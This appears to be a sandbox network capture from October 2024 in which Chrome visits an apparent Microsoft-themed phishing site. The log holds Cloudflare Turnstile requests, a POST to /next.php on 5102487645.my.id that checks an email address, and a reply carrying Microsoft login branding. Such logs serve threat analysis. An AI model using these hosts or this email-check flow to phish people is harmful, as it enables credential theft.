                                                                                                                  Data Ascii: v_8d6a10f63a046c33=sPX5O5o5%2b5A5O-0R-0u5-8+WO7-2k-VV0IQ0+t5090$5sWzV0g5iuX5+ZmX0W5XP-QGzX50ZS0iXzm0px0$+QUXk0h5z6v0hQtz2A5+xM887nseF0p5zDJo5zk40Gt+q1DYvWzKJF4y8Pe0cu8watxZ5+a0Al-Mat04b502rz-XcWEpDXVB5b6i5+-0-P8yB3XxEx0RgrNe2X0fg80NxF80pAi2gk0JCzWpz5A0c4u
                                                                                                                  2024-10-22 14:09:41 UTC434INHTTP/1.1 400 Bad Request
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:41 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 14
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  cf-chl-out: 6E+ozQQQrFQqPOwzsVyQznkuSlQ7bJf/LWbofGbf8uuNKnmOEd+6+FA/vb8QdcJFnZgUPeMiUYzaW80U601CjPX7$tfT92XAxEXiW55qB
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a1108ff6d3aac-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:41 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 31 30 32 30 30 7d
                                                                                                                  Data Ascii: {"err":110200}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  76192.168.2.1649843104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:52 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv3/ft_4y_PuFbfD3r8D/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Referer: https://5102487645.my.id/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:52 UTC433INHTTP/1.1 500 Internal Server Error
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:52 GMT
                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                  Content-Length: 15
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a114dccdb6994-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:52 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 30
                                                                                                                  Data Ascii: error code: 500


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  77192.168.2.1649847104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:59 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv3/ft_4y_PuFbfD3r8D/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Referer: https://5102487645.my.id/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:59 UTC1368INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 26707
                                                                                                                  Connection: close
                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                  referrer-policy: same-origin
                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  document-policy: js-profiling
                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  origin-agent-cluster: ?1
                                                                                                                  2024-10-22 14:09:59 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 36 61 31 31 37 39 37 66 36 37 36 62 37 39 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8d6a11797f676b79-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:59 UTC1288INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                  2024-10-22 14:09:59 UTC1369INData Raw: 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69
                                                                                                                  Data Ascii: den;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:anti
                                                                                                                  2024-10-22 14:09:59 UTC1369INData Raw: 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b
                                                                                                                  Data Ascii: line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;
                                                                                                                  2024-10-22 14:09:59 UTC1369INData Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c
                                                                                                                  Data Ascii: #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #chal
                                                                                                                  2024-10-22 14:09:59 UTC1369INData Raw: 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c
                                                                                                                  Data Ascii: me-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-l
                                                                                                                  2024-10-22 14:09:59 UTC1369INData Raw: 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 75 6f 34 73 36 66 64 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69
                                                                                                                  Data Ascii: -dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.uo4s6fd{0%{fill:#de1303;stroke:#de1303}to{fi
                                                                                                                  2024-10-22 14:09:59 UTC1369INData Raw: 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b
                                                                                                                  Data Ascii: x-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{
                                                                                                                  2024-10-22 14:09:59 UTC1369INData Raw: 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73
                                                                                                                  Data Ascii: x}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;jus
                                                                                                                  2024-10-22 14:09:59 UTC1369INData Raw: 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65
                                                                                                                  Data Ascii: 9;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  78192.168.2.1649848162.241.71.1264432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:59 UTC696OUTPOST /next.php HTTP/1.1
                                                                                                                  Host: 5102487645.my.id
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 30
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Origin: https://apeidieppe-d.basiic.net
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:59 UTC30OUTData Raw: 64 6f 3d 63 68 65 63 6b 26 65 6d 61 69 6c 3d 6d 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d
                                                                                                                  Data Ascii: do=check&email=m@microsoft.com
                                                                                                                  2024-10-22 14:10:01 UTC292INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:59 GMT
                                                                                                                  Server: Apache
                                                                                                                  Access-Control-Allow-Origin: https://apeidieppe-d.basiic.net
                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                  Access-Control-Max-Age: 86400
                                                                                                                  Connection: close
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  2024-10-22 14:10:01 UTC1776INData Raw: 36 65 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 62 61 6e 6e 65 72 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 69 6d 61 67 65 73 2e 6e 65 74 5c 2f 64 62 64 35 61 32 64 64 2d 6e 32 6b 78 75 65 72 69 79 2d 64 6d 38 66 68 79 66 30 61 6e 76 75 6c 6d 76 68 69 33 6b 64 62 6b 6b 78 71 6c 75 75 65 6b 79 66 63 5c 2f 6c 6f 67 69 6e 74 65 6e 61 6e 74 62 72 61 6e 64 69 6e 67 5c 2f 30 5c 2f 62 61 6e 6e 65 72 6c 6f 67 6f 3f 74 73 3d 36 33 36 37 38 33 35 36 30 36 39 37 31 37 31 30 38 39 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 69 6d 61 67 65 73 2e 6e 65 74 5c 2f 64 62 64 35 61 32 64 64 2d 6e 32 6b 78 75 65 72 69 79 2d 64 6d 38 66 68
                                                                                                                  Data Ascii: 6e4{"status":"success","banner":"https:\/\/aadcdn.msauthimages.net\/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc\/logintenantbranding\/0\/bannerlogo?ts=636783560697171089","background":"https:\/\/aadcdn.msauthimages.net\/dbd5a2dd-n2kxueriy-dm8fh


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  79192.168.2.1649850104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:10:00 UTC745OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a11797f676b79&lang=auto HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv3/ft_4y_PuFbfD3r8D/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:10:00 UTC331INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:10:00 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 122257
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a117faf466c76-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:10:00 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                                                  2024-10-22 14:10:00 UTC1369INData Raw: 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73
